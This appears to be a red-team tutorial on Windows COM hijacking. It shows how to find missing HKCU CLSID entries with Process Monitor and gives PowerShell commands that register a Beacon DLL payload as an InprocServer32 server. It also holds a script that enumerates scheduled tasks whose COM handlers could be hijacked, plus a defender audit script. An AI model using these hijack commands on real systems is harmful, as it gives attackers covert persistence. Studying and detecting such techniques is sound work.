Hunting for COM Hijacks

- Look for hijackable COM components with Process Monitor:

Launch procmon64.exe on the Attacker Desktop.

Due to the sheer number of events generated, filtering is essential to find the ones of interest. We're looking for RegOpenKey operations where the Result is NAME NOT FOUND and the Path ends with InprocServer32.

To speed up the collection, click around: go into the Windows menu, launch applications, etc.

One aspect to look out for is how often a particular CLSID is loaded. If you hijack one that is loaded every couple of seconds, you're going to have a rough time, so it's well worth the additional effort to find one that's loaded semi-frequently but not constantly, or one that's loaded when a commonly used application (Word, Excel, Outlook, etc.) is opened.

Pick out a CLSID and check whether that entry exists in HKLM but not in HKCU, or vice versa. Example:

Get-Item -Path "HKLM:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32"

Get-Item -Path "HKCU:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32"

To exploit this, we can create the necessary registry entries in HKCU and point them at a Beacon DLL. Example:

New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"

New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\Payloads\http_x64.dll"

New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"

To clean up a COM hijack, simply remove the registry entries from HKCU and delete the DLL.
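A defender-side check for the condition described above, as an added example that is not part of the original page: it lists InprocServer32 registrations under HKCU, flags those that shadow an HKLM entry for the same CLSID, and reports the Authenticode status of the DLL each one points at. The function name Get-ShadowedComServer and its parameters are made up for this example.

```powershell
# Added example (not from the original page): read-only audit of the current
# user's hive for InprocServer32 registrations that shadow an HKLM entry.
function Get-ShadowedComServer {
    [CmdletBinding()]
    param(
        [string]$UserRoot    = 'HKCU:\Software\Classes\CLSID',
        [string]$MachineRoot = 'HKLM:\Software\Classes\CLSID'
    )

    # Read the (default) value of a key, which is the DLL COM will load.
    function Get-ServerDll([string]$KeyPath) {
        if (-not (Test-Path -LiteralPath $KeyPath)) { return $null }
        $value = (Get-Item -LiteralPath $KeyPath).GetValue('')
        if ($value) { ([string]$value).Trim('"') } else { $null }
    }

    if (-not (Test-Path -LiteralPath $UserRoot)) { return }

    foreach ($key in Get-ChildItem -LiteralPath $UserRoot -ErrorAction SilentlyContinue) {
        $clsid   = $key.PSChildName
        $userDll = Get-ServerDll "$UserRoot\$clsid\InprocServer32"
        if (-not $userDll) { continue }   # no per-user in-process server

        $machineDll = Get-ServerDll "$MachineRoot\$clsid\InprocServer32"

        # Check the Authenticode signature only when the path resolves to a file.
        $signature = 'NotResolved'
        if (Test-Path -LiteralPath $userDll -PathType Leaf) {
            $signature = (Get-AuthenticodeSignature -LiteralPath $userDll).Status
        }

        [pscustomobject]@{
            Clsid          = $clsid
            UserDll        = $userDll
            MachineDll     = $machineDll
            ShadowsMachine = [bool]$machineDll
            Signature      = $signature
        }
    }
}

# Entries that override a machine-wide server are listed first.
Get-ShadowedComServer |
    Sort-Object ShadowsMachine -Descending |
    Format-Table -AutoSize -Wrap
```

Per-user installers also register COM servers in HKCU, so a hit is a lead to triage (unsigned DLL, user-writable path) rather than proof of a hijack.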

- Look for hijackable COM components in the Task Scheduler:

We can use the following PowerShell to find compatible tasks.

$Tasks = Get-ScheduledTask

foreach ($Task in $Tasks)
{
  # Keep tasks whose action is a COM handler (it has a ClassId)
  if ($Task.Actions.ClassId -ne $null)
  {
    # ...that have an enabled trigger
    if ($Task.Triggers.Enabled -eq $true)
    {
      # ...and that run for any member of the Users group
      if ($Task.Principal.GroupId -eq "Users")
      {
        Write-Host "Task Name: " $Task.TaskName
        Write-Host "Task Path: " $Task.TaskPath
        Write-Host "CLSID: " $Task.Actions.ClassId
        Write-Host
      }
    }
  }
}
